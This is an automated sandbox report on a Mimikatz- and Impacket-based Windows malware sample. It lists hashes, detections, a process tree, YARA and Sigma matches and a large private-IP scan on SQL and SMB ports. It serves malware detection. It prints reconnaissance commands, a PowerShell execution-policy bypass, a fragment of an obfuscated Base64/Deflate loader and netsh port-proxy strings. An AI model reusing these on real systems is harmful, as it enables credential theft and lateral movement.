
Analysis Report UlJpFEz1Cj

Overview

General Information

Sample Name: UlJpFEz1Cj (renamed file extension from none to exe)
Analysis ID: 381876
MD5: dde978f310f46d0556ea774da695b698
SHA1: e22548f91b17d4f4fc38dfe1b90ea71b1a2bfed1
SHA256: 0bc20b98a473491219885cc68d0f0944563260ae12add1b1199e64255e92c40d
Tags: ShenzhenSmartspaceSoftwaretechnologyCoLimited

Detection

Mimikatz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Hacktool Mimikatz
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Found suspicious powershell code related to unpacking or dynamic code loading
Gathers network related connection and port information
Machine Learning detection for sample
Uses ipconfig to lookup or modify the Windows network settings
Uses netstat to query active network connections and open ports
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Reconnaissance Activity
Uses 32bit PE files
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Classification legend: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)

  • System is w10x64
  • UlJpFEz1Cj.exe (PID: 6528 cmdline: 'C:\Users\user\Desktop\UlJpFEz1Cj.exe' MD5: DDE978F310F46D0556EA774DA695B698)
    • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • UlJpFEz1Cj.exe (PID: 6640 cmdline: 'C:\Users\user\Desktop\UlJpFEz1Cj.exe' MD5: DDE978F310F46D0556EA774DA695B698)
      • cmd.exe (PID: 6684 cmdline: cmd /c wmic ntdomain get domainname MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • WMIC.exe (PID: 6696 cmdline: wmic ntdomain get domainname MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • cmd.exe (PID: 6752 cmdline: cmd /c net localgroup administrators MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • net.exe (PID: 6764 cmdline: net localgroup administrators MD5: DD0561156F62BC1958CE0E370B23711B)
          • net1.exe (PID: 6788 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: B5A26C2BF17222E86B91D26F1247AF3E)
      • cmd.exe (PID: 6804 cmdline: cmd /c net group 'domain admins' /domain MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • net.exe (PID: 6816 cmdline: net group 'domain admins' /domain MD5: DD0561156F62BC1958CE0E370B23711B)
          • net1.exe (PID: 6832 cmdline: C:\Windows\system32\net1 group 'domain admins' /domain MD5: B5A26C2BF17222E86B91D26F1247AF3E)
      • powershell.exe (PID: 6964 cmdline: C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe -exec bypass 'import-module C:\Users\user\Desktop\m2.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4276 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • ipconfig.exe (PID: 4944 cmdline: ipconfig /all MD5: B0C7423D02A007461C850CD0DFE09318)
      • ipconfig.exe (PID: 6448 cmdline: ipconfig /all MD5: B0C7423D02A007461C850CD0DFE09318)
      • NETSTAT.EXE (PID: 4424 cmdline: netstat -na MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
  • cleanup

Malware Configuration

No configs have been found
Source | Rule | Description | Author | Strings
UlJpFEz1Cj.exe | Impacket_Keyword | Detects Impacket Keyword in Executable | Florian Roth
  • 0x6a1d1c:$s1: impacket.smb(
  • 0x6a1ced:$s2: impacket.ntlm(
  • 0x6a1c8b:$s3: impacket.nmb(
UlJpFEz1Cj.exe | Impacket_Tools_psexec | Compiled Impacket Tools | Florian Roth
  • 0x6a1a63:$s1: impacket.examples.serviceinstall(
  • 0x6a1a26:$s3: impacket.examples.remcomsvc(
UlJpFEz1Cj.exe | Impacket_Lateral_Movement | Detects Impacket Network Aktivity for Lateral Movement | Markus Neis
  • 0x6a197b:$s1: impacket.dcerpc.v5.transport(
  • 0x6a1daf:$s2: impacket.smbconnection(
  • 0x6a1825:$s3: impacket.dcerpc.v5.ndr(
  • 0x6a1de7:$s4: impacket.spnego(
  • 0x6a1d1c:$s5: impacket.smb(
  • 0x6a1ced:$s6: impacket.ntlm(
  • 0x6a1c8b:$s7: impacket.nmb(
Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20210405\PowerShell_transcript.830021.w56wNSku.20210405112311.txt | Mimikatz_Logfile | Detects a log file generated by malicious hack tool mimikatz | Florian Roth
  • 0x5b6:$s1: SID :
  • 0x858:$s1: SID :
  • 0xa13:$s1: SID :
  • 0xb9d:$s1: SID :
  • 0xd72:$s1: SID :
  • 0xeff:$s1: SID :
  • 0x1089:$s1: SID :
  • 0x11c3:$s1: SID :
  • 0x64c:$s2: * NTLM :
  • 0x4d1:$s3: Authentication Id :
  • 0x77e:$s3: Authentication Id :
  • 0x939:$s3: Authentication Id :
  • 0xac3:$s3: Authentication Id :
  • 0xc95:$s3: Authentication Id :
  • 0xe22:$s3: Authentication Id :
  • 0xfaf:$s3: Authentication Id :
  • 0x10de:$s3: Authentication Id :
  • 0x6bd:$s4: wdigest :
  • 0x888:$s4: wdigest :
  • 0xa47:$s4: wdigest :
  • 0xbcd:$s4: wdigest :
C:\Users\user\Desktop\mkatz.ini | Mimikatz_Logfile | Detects a log file generated by malicious hack tool mimikatz | Florian Roth
  • 0x2ae:$s1: SID :
  • 0x569:$s1: SID :
  • 0x738:$s1: SID :
  • 0x8d3:$s1: SID :
  • 0xabc:$s1: SID :
  • 0xc5a:$s1: SID :
  • 0xdf5:$s1: SID :
  • 0xf3d:$s1: SID :
  • 0x349:$s2: * NTLM :
  • 0x1c3:$s3: Authentication Id :
  • 0x489:$s3: Authentication Id :
  • 0x658:$s3: Authentication Id :
  • 0x7f3:$s3: Authentication Id :
  • 0x9d9:$s3: Authentication Id :
  • 0xb77:$s3: Authentication Id :
  • 0xd15:$s3: Authentication Id :
  • 0xe52:$s3: Authentication Id :
  • 0x3bd:$s4: wdigest :
  • 0x59c:$s4: wdigest :
  • 0x76f:$s4: wdigest :
  • 0x906:$s4: wdigest :
C:\Users\user\Desktop\m2.ps1 | apt_c16_win_wateringhole | Detects code from APT wateringhole | @dragonthreatlab
  • 0x0:$str2: Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(
Source | Rule | Description | Author | Strings
00000003.00000003.203224359.0000000004464000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth
  • 0x99a8:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x9ac4:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x9be7:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x9d05:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.203074202.000000000435C000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth
  • 0x15cf6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x15e16:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x15f36:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3f386:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3f44c:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3f512:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth
  • 0x314:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3da:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x4a0:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x319f:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x57cc:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x5892:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x5958:$x1: netsh interface portproxy add v4tov4 listenport=
00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth
  • 0x3a096:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a1b6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a2d6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a3f6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3a516:$x1: netsh interface portproxy add v4tov4 listenport=
Process Memory Space: UlJpFEz1Cj.exe PID: 6640 | SUSP_Netsh_PortProxy_Command | Detects a suspicious command line with netsh and the portproxy command | Florian Roth
  • 0x9ac:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xab4:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xbbf:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xcc8:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xdd1:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3047:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x316b:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x3292:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x33b6:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x34da:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x35f1:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x6e4d:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x6f13:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x6fd9:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x72fd:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x73c3:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0x7489:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xc8c7:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xc98d:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xca53:$x1: netsh interface portproxy add v4tov4 listenport=
  • 0xd4b8:$x1: netsh interface portproxy add v4tov4 listenport=

Sigma Overview

System Summary:

Sigma detected: Suspicious Reconnaissance Activity
Source: Process started; Author: Florian Roth, omkar72; Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c net localgroup administrators, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6752, ProcessCommandLine: net localgroup administrators, ProcessId: 6764
Sigma detected: Net.exe Execution
Source: Process started; Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements); Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: cmd /c net localgroup administrators, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6752, ProcessCommandLine: net localgroup administrators, ProcessId: 6764

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: UlJpFEz1Cj.exe; Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\Desktop\m2.ps1; Avira: detection malicious, Label: TR/Drop.PShell.B
Multi AV Scanner detection for domain / URL
Source: info.ackng.com; Virustotal: Detection: 10%
Source: beahh.com; Virustotal: Detection: 10%
Multi AV Scanner detection for submitted file
Source: UlJpFEz1Cj.exe; Virustotal: Detection: 60%
Source: UlJpFEz1Cj.exe; ReversingLabs: Detection: 82%
Machine Learning detection for sample
Source: UlJpFEz1Cj.exe; Joe Sandbox ML: detected
Source: 3.1.UlJpFEz1Cj.exe.1120000.15.unpack; Avira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1120000.16.unpack; Avira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1150000.19.unpack; Avira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1160000.22.unpack; Avira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1160000.21.unpack; Avira: Label: TR/Crypt.XPACK.Gen7
Source: 3.1.UlJpFEz1Cj.exe.1150000.20.unpack; Avira: Label: TR/Crypt.XPACK.Gen7

Exploits:

Connects to many different private IPs (likely to spread or exploit)
Source: global traffic; TCP traffic (destination IP:port, in the order recorded by the sandbox):
192.168.1.217:1433, 192.168.1.218:1433, 192.168.1.219:1433, 192.168.1.213:1433, 192.168.1.214:1433, 192.168.1.215:1433, 192.168.1.216:1433, 192.168.1.210:1433,
192.168.1.211:1433, 192.168.1.212:1433, 192.168.1.206:1433, 192.168.1.207:1433, 192.168.1.208:1433, 192.168.1.209:1433, 192.168.1.202:1433, 192.168.1.203:1433,
192.168.1.204:1433, 192.168.1.205:1433, 192.168.1.200:1433, 192.168.1.201:1433, 192.168.1.118:1433, 192.168.1.239:445, 192.168.1.119:1433, 192.168.1.114:1433,
192.168.1.235:445, 192.168.1.115:1433, 192.168.1.236:445, 192.168.1.116:1433, 192.168.1.237:445, 192.168.1.117:1433, 192.168.1.238:445, 192.168.1.110:1433,
192.168.1.231:445, 192.168.1.111:1433, 192.168.1.232:445, 192.168.1.112:1433, 192.168.1.233:445, 192.168.1.113:1433, 192.168.1.234:445, 192.168.1.230:445,
192.168.1.107:1433, 192.168.1.228:445, 192.168.1.108:1433, 192.168.1.229:1433, 192.168.1.109:1433, 192.168.1.103:1433, 192.168.1.224:1433, 192.168.1.104:1433,
192.168.1.225:1433, 192.168.1.105:1433, 192.168.1.226:445, 192.168.1.106:1433, 192.168.1.227:445, 192.168.1.220:1433, 192.168.1.100:1433, 192.168.1.221:1433,
192.168.1.101:1433, 192.168.1.222:1433, 192.168.1.102:1433, 192.168.1.223:1433, 192.168.1.74:1433, 192.168.1.73:1433, 192.168.1.76:1433, 192.168.1.75:1433,
192.168.1.78:1433, 192.168.1.77:1433, 192.168.1.79:1433, 192.168.1.70:1433, 192.168.1.72:1433, 192.168.1.71:1433, 192.168.1.59:1433, 192.168.0.94:1433,
192.168.1.63:1433, 192.168.0.95:1433, 192.168.1.62:1433, 192.168.0.96:1433, 192.168.1.65:1433, 192.168.0.97:1433, 192.168.1.64:1433, 192.168.0.98:1433,
192.168.1.67:1433, 192.168.0.99:1433, 192.168.1.66:1433, 192.168.1.69:1433, 192.168.1.68:1433, 192.168.0.90:1433, 192.168.0.91:1433, 192.168.0.92:1433,
192.168.1.61:1433, 192.168.0.93:1433, 192.168.1.60:1433, 192.168.1.49:1433, 192.168.1.48:1433, 192.168.0.83:1433, 192.168.1.52:1433, 192.168.0.84:1433,
192.168.1.51:1433, 192.168.0.85:1433, 192.168.1.54:1433, 192.168.0.86:1433, 192.168.1.53:1433, 192.168.0.87:1433, 192.168.1.56:1433, 192.168.0.88:1433,
192.168.1.55:1433, 192.168.0.89:1433, 192.168.1.58:1433, 192.168.1.57:1433, 192.168.0.80:1433, 192.168.0.81:1433, 192.168.1.50:1433, 192.168.0.82:1433,
192.168.0.69:1433, 192.168.1.38:1433, 192.168.1.37:1433, 192.168.1.39:1433, 192.168.0.72:1433, 192.168.1.41:1433, 192.168.0.73:1433, 192.168.1.40:1433,
192.168.0.74:1433, 192.168.1.43:1433, 192.168.0.75:1433, 192.168.1.42:1433, 192.168.0.76:1433, 192.168.1.45:1433, 192.168.0.77:1433, 192.168.1.44:1433,
192.168.0.78:1433, 192.168.1.47:1433, 192.168.0.79:1433, 192.168.1.46:1433, 192.168.0.70:1433, 192.168.0.71:1433, 192.168.1.96:1433, 192.168.1.95:1433,
192.168.1.98:1433, 192.168.1.97:1433, 192.168.1.99:1433, 192.168.1.90:1433, 192.168.1.92:1433, 192.168.1.91:1433, 192.168.1.94:1433, 192.168.1.93:1433,
192.168.1.85:1433, 192.168.1.84:1433, 192.168.1.87:1433, 192.168.1.86:1433, 192.168.1.89:1433, 192.168.1.88:1433, 192.168.1.81:1433, 192.168.1.80:1433,
192.168.1.83:1433, 192.168.1.82:1433, 192.168.0.2:1433, 192.168.0.1:1433, 192.168.0.4:1433, 192.168.0.3:1433, 192.168.0.14:1433, 192.168.0.9:1433,
192.168.0.15:1433, 192.168.0.16:1433, 192.168.0.17:1433, 192.168.0.6:1433, 192.168.0.18:1433, 192.168.0.5:1433, 192.168.0.19:1433, 192.168.0.8:1433,
192.168.0.7:1433, 192.168.0.20:1433, 192.168.0.21:1433, 192.168.0.22:1433, 192.168.0.23:1433, 192.168.0.24:1433, 192.168.0.10:1433, 192.168.0.11:1433,
192.168.0.12:1433, 192.168.0.13:1433, 192.168.1.1:1433, 192.168.1.3:1433, 192.168.1.2:1433, 192.168.1.9:1433, 192.168.1.8:1433, 192.168.1.5:1433,
192.168.1.4:1433, 192.168.1.7:1433, 192.168.1.6:1433, 192.168.0.170:1433, 192.168.0.172:1433, 192.168.0.171:1433, 192.168.0.58:1433, 192.168.1.27:1433,
192.168.0.59:1433, 192.168.1.26:1433, 192.168.1.29:1433, 192.168.1.28:1433, 192.168.0.61:1433, 192.168.1.30:1433, 192.168.0.62:1433, 192.168.0.63:1433,
192.168.1.32:1433, 192.168.0.64:1433, 192.168.1.31:1433, 192.168.0.65:1433, 192.168.1.34:1433, 192.168.0.66:1433, 192.168.1.33:1433, 192.168.0.67:1433,
192.168.1.36:1433, 192.168.0.68:1433, 192.168.1.35:1433, 192.168.0.178:1433, 192.168.0.177:1433, 192.168.0.179:1433, 192.168.0.174:1433, 192.168.0.173:1433,
192.168.0.176:1433, 192.168.0.60:1433, 192.168.0.175:1433, 192.168.0.161:1433, 192.168.0.160:1433, 192.168.0.47:1433, 192.168.1.16:1433, 192.168.0.48:1433,
192.168.1.15:1433, 192.168.0.49:1433, 192.168.1.18:1433, 192.168.1.17:1433, 192.168.1.19:1433, 192.168.0.50:1433, 192.168.0.51:1433, 192.168.0.52:1433,
192.168.1.21:1433, 192.168.0.53:1433, 192.168.1.20:1433, 192.168.0.54:1433, 192.168.1.23:1433, 192.168.0.55:1433, 192.168.1.22:1433, 192.168.0.56:1433,
192.168.1.25:1433, 192.168.0.57:1433, 192.168.1.24:1433, 192.168.0.167:1433, 192.168.0.166:1433, 192.168.0.169:1433, 192.168.0.168:1433, 192.168.0.163:1433,
192.168.0.162:1433, 192.168.0.165:1433, 192.168.0.164:1433, 192.168.0.192:1433, 192.168.0.191:1433, 192.168.0.194:1433, 192.168.0.193:1433, 192.168.0.190:1433,
192.168.0.36:1433, 192.168.0.37:1433, 192.168.0.38:1433, 192.168.0.39:1433, 192.168.0.40:1433, 192.168.0.41:1433, 192.168.1.10:1433, 192.168.0.42:1433,
192.168.0.43:1433, 192.168.1.12:1433, 192.168.0.44:1433, 192.168.1.11:1433, 192.168.0.45:1433, 192.168.1.14:1433, 192.168.0.46:1433, 192.168.1.13:1433,
192.168.0.199:1433, 192.168.0.196:1433, 192.168.0.195:1433, 192.168.0.198:1433, 192.168.0.197:1433, 192.168.0.181:1433, 192.168.0.180:1433, 192.168.0.183:1433,
192.168.0.182:1433, 192.168.0.25:1433, 192.168.0.26:1433, 192.168.0.27:1433, 192.168.0.28:1433, 192.168.0.29:1433, 192.168.0.30:1433, 192.168.0.31:1433,
192.168.0.32:1433, 192.168.0.33:1433, 192.168.0.34:1433, 192.168.0.35:1433, 192.168.0.189:1433, 192.168.0.188:1433, 192.168.0.185:1433, 192.168.0.184:1433,
192.168.0.187:1433, 192.168.0.186:1433, 192.168.1.176:1433, 192.168.1.177:1433, 192.168.1.178:1433, 192.168.1.179:1433, 192.168.1.172:1433, 192.168.1.173:1433,
192.168.1.174:1433, 192.168.1.175:1433, 192.168.1.170:1433, 192.168.1.171:1433, 192.168.0.138:1433, 192.168.0.137:1433, 192.168.0.139:1433, 192.168.0.134:1433,
192.168.0.133:1433, 192.168.0.254:1433, 192.168.0.136:1433, 192.168.0.135:1433, 192.168.0.251:1433, 192.168.0.130:1433, 192.168.0.250:1433, 192.168.0.253:1433,
192.168.0.132:1433, 192.168.0.252:1433, 192.168.0.131:1433, 192.168.1.169:1433, 192.168.1.165:1433, 192.168.1.166:1433, 192.168.1.167:1433, 192.168.1.168:1433,
192.168.1.161:1433, 192.168.1.162:1433, 192.168.1.163:1433, 192.168.1.164:1433, 192.168.1.160:1433, 192.168.0.248:1433, 192.168.0.127:1433, 192.168.0.247:1433,
192.168.0.126:1433, 192.168.0.129:1433, 192.168.0.249:1433, 192.168.0.128:1433, 192.168.0.123:1433, 192.168.0.244:1433, 192.168.0.122:1433, 192.168.0.243:1433,
192.168.0.125:1433, 192.168.0.246:1433, 192.168.0.124:1433, 192.168.0.245:1433, 192.168.0.240:1433, 192.168.0.242:1433, 192.168.0.121:1433, 192.168.0.241:1433,
192.168.0.120:1433, 192.168.0.150:1433, 192.168.1.198:1433, 192.168.1.199:1433, 192.168.1.194:1433, 192.168.1.195:1433, 192.168.1.196:1433, 192.168.1.197:1433,
192.168.1.190:1433, 192.168.1.191:1433, 192.168.1.192:1433, 192.168.1.193:1433, 192.168.0.159:1433, 192.168.0.156:1433, 192.168.0.155:1433, 192.168.0.158:1433,
192.168.0.157:1433, 192.168.0.152:1433, 192.168.0.151:1433, 192.168.0.154:1433, 192.168.0.153:1433, 192.168.1.187:1433, 192.168.1.188:1433, 192.168.1.189:1433,
192.168.1.183:1433, 192.168.1.184:1433, 192.168.1.185:1433, 192.168.1.186:1433, 192.168.1.180:1433, 192.168.1.181:1433, 192.168.1.182:1433, 192.168.0.149:1433,
192.168.0.148:1433, 192.168.0.145:1433, 192.168.0.144:1433, 192.168.0.147:1433, 192.168.0.146:1433, 192.168.0.141:1433
Source: global trafficTCP traffic: 192.168.0.140:1433
Source: global trafficTCP traffic: 192.168.0.143:1433
Source: global trafficTCP traffic: 192.168.0.142:1433
Source: global trafficTCP traffic: 192.168.1.136:1433
Source: global trafficTCP traffic: 192.168.1.137:1433
Source: global trafficTCP traffic: 192.168.1.138:1433
Source: global trafficTCP traffic: 192.168.1.139:1433
Source: global trafficTCP traffic: 192.168.1.132:1433
Source: global trafficTCP traffic: 192.168.1.253:445
Source: global trafficTCP traffic: 192.168.1.133:1433
Source: global trafficTCP traffic: 192.168.1.254:445
Source: global trafficTCP traffic: 192.168.1.134:1433
Source: global trafficTCP traffic: 192.168.1.135:1433
Source: global trafficTCP traffic: 192.168.1.250:445
Source: global trafficTCP traffic: 192.168.1.130:1433
Source: global trafficTCP traffic: 192.168.1.251:445
Source: global trafficTCP traffic: 192.168.1.131:1433
Source: global trafficTCP traffic: 192.168.1.252:445
Source: global trafficTCP traffic: 192.168.0.219:1433
Source: global trafficTCP traffic: 192.168.0.218:1433
Source: global trafficTCP traffic: 192.168.0.215:1433
Source: global trafficTCP traffic: 192.168.0.214:1433
Source: global trafficTCP traffic: 192.168.0.217:1433
Source: global trafficTCP traffic: 192.168.0.216:1433
Source: global trafficTCP traffic: 192.168.0.211:1433
Source: global trafficTCP traffic: 192.168.0.210:1433
Source: global trafficTCP traffic: 192.168.0.213:1433
Source: global trafficTCP traffic: 192.168.0.212:1433
Source: global trafficTCP traffic: 192.168.1.129:1433
Source: global trafficTCP traffic: 192.168.1.125:1433
Source: global trafficTCP traffic: 192.168.1.246:445
Source: global trafficTCP traffic: 192.168.1.126:1433
Source: global trafficTCP traffic: 192.168.1.247:445
Source: global trafficTCP traffic: 192.168.1.127:1433
Source: global trafficTCP traffic: 192.168.1.248:445
Source: global trafficTCP traffic: 192.168.1.128:1433
Source: global trafficTCP traffic: 192.168.1.249:445
Source: global trafficTCP traffic: 192.168.1.121:1433
Source: global trafficTCP traffic: 192.168.1.242:445
Source: global trafficTCP traffic: 192.168.1.122:1433
Source: global trafficTCP traffic: 192.168.1.243:445
Source: global trafficTCP traffic: 192.168.1.123:1433
Source: global trafficTCP traffic: 192.168.1.244:445
Source: global trafficTCP traffic: 192.168.1.124:1433
Source: global trafficTCP traffic: 192.168.1.245:445
Source: global trafficTCP traffic: 192.168.1.240:445
Source: global trafficTCP traffic: 192.168.1.120:1433
Source: global trafficTCP traffic: 192.168.1.241:445
Source: global trafficTCP traffic: 192.168.0.208:1433
Source: global trafficTCP traffic: 192.168.0.207:1433
Source: global trafficTCP traffic: 192.168.0.209:1433
Source: global trafficTCP traffic: 192.168.0.204:1433
Source: global trafficTCP traffic: 192.168.0.203:1433
Source: global trafficTCP traffic: 192.168.0.206:1433
Source: global trafficTCP traffic: 192.168.0.205:1433
Source: global trafficTCP traffic: 192.168.0.200:1433
Source: global trafficTCP traffic: 192.168.0.202:1433
Source: global trafficTCP traffic: 192.168.0.201:1433
Source: global trafficTCP traffic: 192.168.1.158:1433
Source: global trafficTCP traffic: 192.168.1.159:1433
Source: global trafficTCP traffic: 192.168.1.154:1433
Source: global trafficTCP traffic: 192.168.1.155:1433
Source: global trafficTCP traffic: 192.168.1.156:1433
Source: global trafficTCP traffic: 192.168.1.157:1433
Source: global trafficTCP traffic: 192.168.1.150:1433
Source: global trafficTCP traffic: 192.168.1.151:1433
Source: global trafficTCP traffic: 192.168.1.152:1433
Source: global trafficTCP traffic: 192.168.1.153:1433
Source: global trafficTCP traffic: 192.168.0.119:1433
Source: global trafficTCP traffic: 192.168.0.116:1433
Source: global trafficTCP traffic: 192.168.0.237:1433
Source: global trafficTCP traffic: 192.168.0.236:1433
Source: global trafficTCP traffic: 192.168.0.115:1433
Source: global trafficTCP traffic: 192.168.0.118:1433
Source: global trafficTCP traffic: 192.168.0.239:1433
Source: global trafficTCP traffic: 192.168.0.117:1433
Source: global trafficTCP traffic: 192.168.0.238:1433
Source: global trafficTCP traffic: 192.168.0.112:1433
Source: global trafficTCP traffic: 192.168.0.233:1433
Source: global trafficTCP traffic: 192.168.0.111:1433
Source: global trafficTCP traffic: 192.168.0.232:1433
Source: global trafficTCP traffic: 192.168.0.235:1433
Source: global trafficTCP traffic: 192.168.0.114:1433
Source: global trafficTCP traffic: 192.168.0.113:1433
Source: global trafficTCP traffic: 192.168.0.234:1433
Source: global trafficTCP traffic: 192.168.0.231:1433
Source: global trafficTCP traffic: 192.168.0.110:1433
Source: global trafficTCP traffic: 192.168.0.230:1433
Source: global trafficTCP traffic: 192.168.1.147:1433
Source: global trafficTCP traffic: 192.168.1.148:1433
Source: global trafficTCP traffic: 192.168.1.149:1433
Source: global trafficTCP traffic: 192.168.1.143:1433
Source: global trafficTCP traffic: 192.168.1.144:1433
Source: global trafficTCP traffic: 192.168.1.145:1433
Source: global trafficTCP traffic: 192.168.1.146:1433
Source: global trafficTCP traffic: 192.168.1.140:1433
Source: global trafficTCP traffic: 192.168.1.141:1433
Source: global trafficTCP traffic: 192.168.1.142:1433
Source: global trafficTCP traffic: 192.168.0.109:1433
Source: global trafficTCP traffic: 192.168.0.229:1433
Source: global trafficTCP traffic: 192.168.0.108:1433
Source: global trafficTCP traffic: 192.168.0.226:1433
Source: global trafficTCP traffic: 192.168.0.105:1433
Source: global trafficTCP traffic: 192.168.0.225:1433
Source: global trafficTCP traffic: 192.168.0.104:1433
Source: global trafficTCP traffic: 192.168.0.107:1433
Source: global trafficTCP traffic: 192.168.0.228:1433
Source: global trafficTCP traffic: 192.168.0.106:1433
Source: global trafficTCP traffic: 192.168.0.227:1433
Source: global trafficTCP traffic: 192.168.0.101:1433
Connects to many different private IPs via SMB (likely to spread or exploit)
Source: global trafficTCP traffic: 192.168.0.104:445
Source: global trafficTCP traffic: 192.168.0.107:445
Source: global trafficTCP traffic: 192.168.0.228:445
Source: global trafficTCP traffic: 192.168.0.106:445
Source: global trafficTCP traffic: 192.168.0.227:445
Source: global trafficTCP traffic: 192.168.0.101:445

Privilege Escalation:

Detected Hacktool Mimikatz
Source: PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | String found in binary or memory: ## \ / ## > http://blog.gentilkiwi.com/mimikatz
Source: UlJpFEz1Cj.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: unknown | HTTPS traffic detected: 45.79.77.20:443 -> 192.168.2.3:49747 version: TLS 1.0
Source: C:\Users\user\Desktop\UlJpFEz1Cj.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9415_none_508df7e2bcbccb90\MSVCR90.dll
Source: UlJpFEz1Cj.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
